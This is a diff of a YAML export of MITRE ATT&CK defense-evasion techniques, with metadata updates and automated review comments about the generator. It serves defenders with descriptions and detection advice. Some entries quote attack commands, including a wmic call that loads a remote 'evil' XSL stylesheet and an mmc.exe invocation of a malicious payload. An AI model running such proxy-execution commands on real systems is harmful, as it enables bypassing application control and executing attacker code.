- description: Desimone, J. (2018, April 18). Status Update. Retrieved July
- 3, 2018.
- - source_name: LOLBAS Wmic
- url: https://lolbas-project.github.io/lolbas/Binaries/Wmic/
- description: LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.
- - source_name: Microsoft msxsl.exe
- url: https://www.microsoft.com/download/details.aspx?id=21714
- description: Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe).
- Retrieved July 3, 2018.
- - source_name: Penetration Testing Lab MSXSL July 2017
- url: https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
- description: netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved
- July 3, 2018.
- - source_name: XSL Bypass Mar 2019
- url: https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
- description: Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to
- Proxy Code Execution. Retrieved August 2, 2019.
- - source_name: Microsoft XSLT Script Mar 2017
- url: https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
- description: Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting
- Using . Retrieved July 3, 2018.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-09-12T19:40:12.337Z'
+ name: XSL Script Processing
description: |-
Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)
@@ -13623,29 +13867,73 @@ defense-evasion:
* Local File: wmic process list /FORMAT:evil[.]xsl
* Remote File: wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”
- modified: '2022-05-24T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: XSL Script Processing
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Avneet Singh
+ - Casey Smith
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: |-
Use process monitoring to monitor the execution and arguments of msxsl.exe and wmic.exe. Compare recent invocations of these utilities with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity (ex: URL command line arguments, creation of external network connections, loading of DLLs associated with scripting). (Citation: LOLBAS Wmic) (Citation: Twitter SquiblyTwo Detection APR 2018) Command arguments used before and after the script invocation may also be useful in determining the origin and purpose of the payload being loaded.
The presence of msxsl.exe or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.
- kill_chain_phases:
- - phase_name: defense-evasion
- kill_chain_name: mitre-attack
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Module: Module Load'
- 'Process: Process Creation'
- x_mitre_system_requirements:
- - Microsoft Core XML Services (MSXML) or access to wmic.exe
x_mitre_defense_bypassed:
- Anti-virus
- Digital Certificate Validation
- Application Control
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_system_requirements:
+ - Microsoft Core XML Services (MSXML) or access to wmic.exe
+ type: attack-pattern
+ id: attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3
+ created: '2018-10-17T00:14:20.652Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1220
+ external_id: T1220
+ - source_name: Reaqta MSXSL Spearphishing MAR 2018
+ description: Admin. (2018, March 2). Spear-phishing campaign leveraging on
+ MSXSL. Retrieved July 3, 2018.
+ url: https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
+ - source_name: Twitter SquiblyTwo Detection APR 2018
+ description: Desimone, J. (2018, April 18). Status Update. Retrieved September
+ 12, 2024.
+ url: https://x.com/dez_/status/986614411711442944
+ - source_name: LOLBAS Wmic
+ description: LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.
+ url: https://lolbas-project.github.io/lolbas/Binaries/Wmic/
+ - source_name: Microsoft msxsl.exe
+ description: Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe).
+ Retrieved July 3, 2018.
+ url: https://www.microsoft.com/download/details.aspx?id=21714
+ - source_name: Penetration Testing Lab MSXSL July 2017
+ description: netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved
+ July 3, 2018.
+ url: https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
+ - source_name: XSL Bypass Mar 2019
+ description: Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to
+ Proxy Code Execution. Retrieved August 2, 2019.
+ url: https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
+ - source_name: Microsoft XSLT Script Mar 2017
+ description: Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting
+ Using . Retrieved July 3, 2018.
+ url: https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1220
atomic_tests: []
T1564.001:
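Review bot: the `Microsoft XSLT Script Mar 2017` reference description still reads "XSLT Stylesheet Scripting Using ." with the element name missing after "Using", exactly as in the removed line, so the regeneration carried the truncated title through. An angle-bracketed element name stripped as markup somewhere in the pipeline would explain it, and the odd line breaks around `SysListView32`, `FindWindow` and `EnumWindows` in the T1055.015 description above look like the same kind of loss; worth checking the generator's text handling rather than the bundle. The Twitter to x.com URL change with the September 2024 retrieval date is consistent with the upstream reference refresh.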
@@ -13678,7 +13966,7 @@ defense-evasion:
description: 'Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware.
Retrieved July 10, 2017.'
source_name: WireLurker
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-29T22:32:25.985Z'
name: 'Hide Artifacts: Hidden Files and Directories'
description: |-
Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (dir /a
for Windows and ls –a
for Linux and macOS).
@@ -13706,48 +13994,11 @@ defense-evasion:
- Host forensic analysis
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1564.001
atomic_tests: []
T1578.001:
technique:
- x_mitre_platforms:
- - IaaS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1
- type: attack-pattern
- created: '2020-06-09T15:33:13.563Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1578.001
- url: https://attack.mitre.org/techniques/T1578/001
- - source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
- description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
- 2020.
- - source_name: AWS Cloud Trail Backup API
- url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
- description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail.
- Retrieved April 27, 2020.
- - source_name: Azure - Monitor Logs
- url: https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor
- description: Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor.
- Retrieved May 1, 2020.
- - source_name: Cloud Audit Logs
- url: https://cloud.google.com/logging/docs/audit#admin-activity
- description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
- - source_name: GCP - Creating and Starting a VM
- url: https://cloud.google.com/compute/docs/instances/create-start-instance#api_2
- description: Google. (2020, April 23). Creating and Starting a VM instance.
- Retrieved May 1, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T15:53:44.870Z'
name: Create Snapshot
description: |-
An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://attack.mitre.org/techniques/T1578/004) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.
@@ -13756,6 +14007,9 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: |-
The creation of a snapshot is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities such as the creation of one or more snapshots and the restoration of these snapshots by a new user account.
@@ -13764,20 +14018,51 @@ defense-evasion:
In Azure, the creation of a snapshot may be captured in Azure activity logs. Backup restoration events can also be detected through Azure Monitor Log Data by creating a custom alert for completed restore jobs.(Citation: Azure - Monitor Logs)
Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of the gcloud compute instances create
command to create a new VM disk from a snapshot.(Citation: Cloud Audit Logs) It is also possible to detect the usage of the GCP API with the "sourceSnapshot":
parameter pointed to "global/snapshots/[BOOT_SNAPSHOT_NAME]
.(Citation: GCP - Creating and Starting a VM)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Snapshot: Snapshot Creation'
- 'Snapshot: Snapshot Metadata'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1
+ created: '2020-06-09T15:33:13.563Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1578/001
+ external_id: T1578.001
+ - source_name: AWS Cloud Trail Backup API
+ description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail.
+ Retrieved April 27, 2020.
+ url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
+ - source_name: GCP - Creating and Starting a VM
+ description: Google. (2020, April 23). Creating and Starting a VM instance.
+ Retrieved May 1, 2020.
+ url: https://cloud.google.com/compute/docs/instances/create-start-instance#api_2
+ - source_name: Cloud Audit Logs
+ description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+ url: https://cloud.google.com/logging/docs/audit#admin-activity
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ - source_name: Azure - Monitor Logs
+ description: Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor.
+ Retrieved May 1, 2020.
+ url: https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1550.001:
technique:
- modified: '2024-04-12T21:18:28.848Z'
+ modified: '2024-10-15T15:38:11.583Z'
name: Application Access Token
description: "Adversaries may use stolen application access tokens to bypass
the typical authentication process and access restricted accounts, information,
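Review bot: `x_mitre_permissions_required: User` is removed from T1578.001 in this hunk, but the same field survives on T1055.015 and T1564.001 elsewhere in this patch. If ATT&CK dropped the field for this object upstream the removal is correct, but the generator should not be dropping it silently; please confirm which it is. Also, the `Mandiant M-Trends 2020` reference now points at a mandiant.com PDF instead of content.fireeye.com while keeping "Retrieved April 24, 2020", so the new URL was not re-verified when the link changed; if the entry is copied verbatim from the bundle, say so in the commit message rather than leaving the mismatch unexplained.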
@@ -13834,6 +14119,7 @@ defense-evasion:
- Dylan Silva, AWS Security
- Jack Burns, HubSpot
- Blake Strom, Microsoft Threat Intelligence
+ - Pawel Partyka, Microsoft Threat Intelligence
x_mitre_deprecated: false
x_mitre_detection: 'Monitor access token activity for abnormal use and permissions
granted to unusual or suspicious applications and APIs. Additionally, administrators
@@ -13844,13 +14130,12 @@ defense-evasion:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- Containers
- IaaS
- - Azure AD
- x_mitre_version: '1.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.7'
x_mitre_data_sources:
- 'Web Credential: Web Credential Usage'
x_mitre_defense_bypassed:
@@ -13909,11 +14194,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.004:
technique:
- modified: '2024-03-29T15:42:13.499Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Cloud Accounts'
description: "Valid accounts in cloud environments may allow adversaries to
perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -13953,8 +14237,10 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
or malicious behavior, such as accessing information outside of the normal
@@ -13962,13 +14248,13 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.7'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.8'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
@@ -13999,9 +14285,6 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.004
atomic_tests: []
T1480.001:
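Review bot: for T1078.004, `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` are moved from the tail of the object to the middle (after `kill_chain_phases` and `x_mitre_is_subtechnique`), while for T1055.015, T1220 and T1578.001 above they are emitted at the tail after `object_marking_refs`; T1556 below gets the same mid-object placement as T1078.004. Two field orders for the same schema in one generated file means the emitter is preserving whatever order the source dict happened to have. Pick one order and apply it everywhere so these move-only hunks disappear from future syncs.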
@@ -14062,7 +14345,7 @@ defense-evasion:
Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.
Like other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-04T14:52:51.290Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Environmental Keying
x_mitre_detection: Detecting the use of environmental keying may be difficult
@@ -14084,11 +14367,10 @@ defense-evasion:
- Static File Analysis
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1564.004:
technique:
- modified: '2024-02-14T21:56:34.831Z'
+ modified: '2024-09-12T15:27:29.615Z'
name: 'Hide Artifacts: NTFS File Attributes'
description: |-
Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)
@@ -14155,8 +14437,8 @@ defense-evasion:
Retrieved March 21, 2018.
url: https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/
- source_name: Microsoft File Streams
- description: Microsoft. (n.d.). File Streams. Retrieved December 2, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa364404
+ description: Microsoft. (n.d.). File Streams. Retrieved September 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/fileio/file-streams
- source_name: Oddvar Moe ADS2 Apr 2018
description: Moe, O. (2018, April 11). Putting Data in Alternate Data Streams
and How to Execute It - Part 2. Retrieved June 30, 2018.
@@ -14174,7 +14456,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564.004
atomic_tests: []
T1055.001:
@@ -14277,12 +14558,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1055.001
atomic_tests: []
T1556:
technique:
- modified: '2024-04-11T21:51:44.851Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Modify Authentication Process
description: |-
Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -14295,6 +14575,7 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Chris Ross @xorrior
x_mitre_deprecated: false
@@ -14331,17 +14612,17 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
- Network
- - Azure AD
- - Google Workspace
- IaaS
- - Office 365
- SaaS
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Process: Process Access'
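Review bot: the platform rename (`Azure AD`, `Google Workspace` and `Office 365` out, `Office Suite` and `Identity Provider` in) is consistent with the `x_mitre_version` bump from 2.4 to 2.5, but anything that filters or indexes techniques by the old platform strings will silently stop matching this object. Check that every per-platform consumer is updated for the new names in the same change, and that the substitution is applied uniformly across the other objects in the patch (T1098.003 lower down gets the same treatment; verify none are left with the old names).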
@@ -14387,9 +14668,6 @@ defense-evasion:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1216:
technique:
@@ -14427,7 +14705,7 @@ defense-evasion:
behavior may be abused by adversaries to execute malicious files that could
bypass application control and signature validation on systems.(Citation:
GitHub Ultimate AppLocker Bypass List)'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-18T14:43:46.045Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Signed Script Proxy Execution
x_mitre_detection: Monitor script processes, such as `cscript`, and command-line
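Review bot: `modified` moves backwards here, from 2022-05-11 to 2022-04-18, and the same regression recurs for several objects below (T1556.004, T1574.004, T1601.002, T1127, T1218.014, T1564.010, T1574.012, T1055.011, T1546.006, T1548.002, T1548.003, T1547.014). Every replaced value shares the suffix `14:00:00.188Z`, which looks like a bulk-assigned placeholder rather than a real edit time, so the new precise timestamps are probably the authoritative upstream values; the commit message should name the upstream bundle or ATT&CK version these were regenerated from so the regression is not mistaken for data loss.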
@@ -14446,7 +14724,6 @@ defense-evasion:
- Digital Certificate Validation
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1216
atomic_tests: []
T1556.004:
@@ -14477,7 +14754,7 @@ defense-evasion:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2021-12-14T23:14:26.107Z'
name: Network Device Authentication
description: |-
Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -14501,12 +14778,10 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574.004:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-03-30T21:01:39.601Z'
name: Dylib Hijacking
description: |-
Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath
, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB
function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
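Review bot: for T1556.004 both `spec_version` and `x_mitre_attack_spec_version: 2.1.0` are removed and nothing in this hunk re-adds the latter, whereas other objects in the patch keep their ATT&CK spec version or bump it to 3.2.0 (T1078.003, T1053.007, T1574.011). If the attribute is re-emitted elsewhere in the object, fine; otherwise T1556.004 ends up with no `x_mitre_attack_spec_version` at all, which is inconsistent with the rest of the file. The same check applies to T1601.002, T1564.010, T1574.012, T1055.011 and T1548.003, which are handled the same way below.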
@@ -14590,7 +14865,6 @@ defense-evasion:
url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1601.002:
technique:
@@ -14612,7 +14886,7 @@ defense-evasion:
url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco
IOS devices. Retrieved October 19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T17:49:02.660Z'
name: Downgrade System Image
description: "Adversaries may install an older version of the operating system
of a network device to weaken security. Older operating system versions on
@@ -14646,12 +14920,10 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1078.003:
technique:
- modified: '2023-07-14T13:04:04.591Z'
+ modified: '2024-10-15T16:36:36.681Z'
name: 'Valid Accounts: Local Accounts'
description: "Adversaries may obtain and abuse credentials of a local account
as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -14703,9 +14975,8 @@ defense-evasion:
external_id: T1078.003
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.003
atomic_tests: []
T1211:
@@ -14774,7 +15045,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1127:
technique:
@@ -14821,7 +15091,7 @@ defense-evasion:
legitimate certificates that allow them to execute on a system and proxy execution
of malicious code through a trusted process that effectively bypasses application
control solutions.'
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T05:00:37.443Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Trusted Developer Utilities Proxy Execution
x_mitre_detection: |-
@@ -14834,12 +15104,13 @@ defense-evasion:
x_mitre_is_subtechnique: false
x_mitre_data_sources:
- 'Command: Command Execution'
+ - 'Module: Module Load'
+ - 'Process: Process Metadata'
- 'Process: Process Creation'
x_mitre_defense_bypassed:
- Application Control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1127
atomic_tests: []
T1218.014:
@@ -14918,7 +15189,7 @@ defense-evasion:
mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious
CLSID payload with the following command: mmc.exe -Embedding C:\\path\\to\\test.msc
.(Citation:
abusing_com_reg)"
- modified: '2022-10-25T14:00:00.188Z'
+ modified: '2022-05-20T17:41:16.112Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: MMC
x_mitre_detection: "Monitor processes and command-line parameters for suspicious
@@ -14940,7 +15211,6 @@ defense-evasion:
- Digital Certificate Validation
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1564.010:
technique:
@@ -14983,7 +15253,7 @@ defense-evasion:
url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2021-11-29T15:56:50.370Z'
name: Process Argument Spoofing
description: |-
Adversaries may attempt to hide process command-line arguments by overwriting process memory. Process command-line arguments are stored in the process environment block (PEB), a data structure used by Windows to store various information about/used by a process. The PEB includes the process command-line arguments that are referenced when executing the process. When a process is created, defensive tools/sensors that monitor process creations may retrieve the process arguments from the PEB.(Citation: Microsoft PEB 2021)(Citation: Xpn Argue Like Cobalt 2019)
@@ -15007,8 +15277,6 @@ defense-evasion:
- 'Process: Process Creation'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574.012:
technique:
@@ -15056,7 +15324,7 @@ defense-evasion:
url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
Profilers. Retrieved June 24, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-30T21:35:12.049Z'
name: 'Hijack Execution Flow: COR_PROFILER'
description: |-
